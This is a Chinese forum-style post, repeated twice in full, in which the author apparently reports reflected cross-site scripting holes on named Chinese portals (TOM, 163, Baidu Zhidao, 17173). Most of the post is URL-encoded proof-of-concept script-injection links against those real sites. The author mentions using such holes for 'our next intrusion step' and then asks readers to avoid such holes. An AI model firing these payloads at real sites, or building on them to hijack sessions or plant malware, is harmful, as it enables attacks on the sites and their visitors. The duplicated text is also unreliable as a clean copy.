最近朋友们老是弄些跨站,一会看这个站被跨站 那个站又被跨站,我看也无聊 顺便弄一些玩玩,到百度上随便搜索了几个站的地址 结果一 测试 全都可以弄,这不得不让人很担心啊。
以下是几个站的截图和地址
TOM网
http://search.tom.com/search.php?f=8&cl=3&f=8&edt=0&word=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%CC%AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&tomsearch=webpage&submit=TOM%CB%D1%CB%F7
163网
http://cha.so.163.com/so_err.php?q=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%CC%AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&ad=&Language=lang_zh-CN&bd=2
百度网
http://zhidao.baidu.com/q?word=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%CC%
AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&ct=17&pn=0&tn=ikaslist&rn=10
17173网
http://search.17173.com/?keyword=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%
CC%AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&Submit2=%D3%CE%CF%B7%CB%D1%CB%F7
腾讯旗下拍拍网
起点在线小说网
目前国内大多数站都存在这样的漏洞
随便看了下 什么中国最大的IT社区 还有什么教育中心 电信企业。。。等等都存在如此的漏洞
当然 我没有去检测是否能成功挂马 但是至少有这样的利用漏洞 就对我们的下一步入侵带来了更好的步骤
所以 希望各位能尽量避免不必要的漏洞!!
以下是几个站的截图和地址
TOM网
http://search.tom.com/search.php?f=8&cl=3&f=8&edt=0&word=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%CC%AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&tomsearch=webpage&submit=TOM%CB%D1%CB%F7
163网
http://cha.so.163.com/so_err.php?q=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%CC%AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&ad=&Language=lang_zh-CN&bd=2
百度网
http://zhidao.baidu.com/q?word=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%CC%
AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&ct=17&pn=0&tn=ikaslist&rn=10
17173网
http://search.17173.com/?keyword=%CC%AB%D7%D3King%3C%2Ftitle%3E%3Cscript%3Ealert%28%22By+%
CC%AB%D7%D3King+%D3%D1%C7%E9%BC%EC%B2%E2%22%29%3C%2Fscript%3E&Submit2=%D3%CE%CF%B7%CB%D1%CB%F7
腾讯旗下拍拍网
起点在线小说网
目前国内大多数站都存在这样的漏洞
随便看了下 什么中国最大的IT社区 还有什么教育中心 电信企业。。。等等都存在如此的漏洞
当然 我没有去检测是否能成功挂马 但是至少有这样的利用漏洞 就对我们的下一步入侵带来了更好的步骤
所以 希望各位能尽量避免不必要的漏洞!!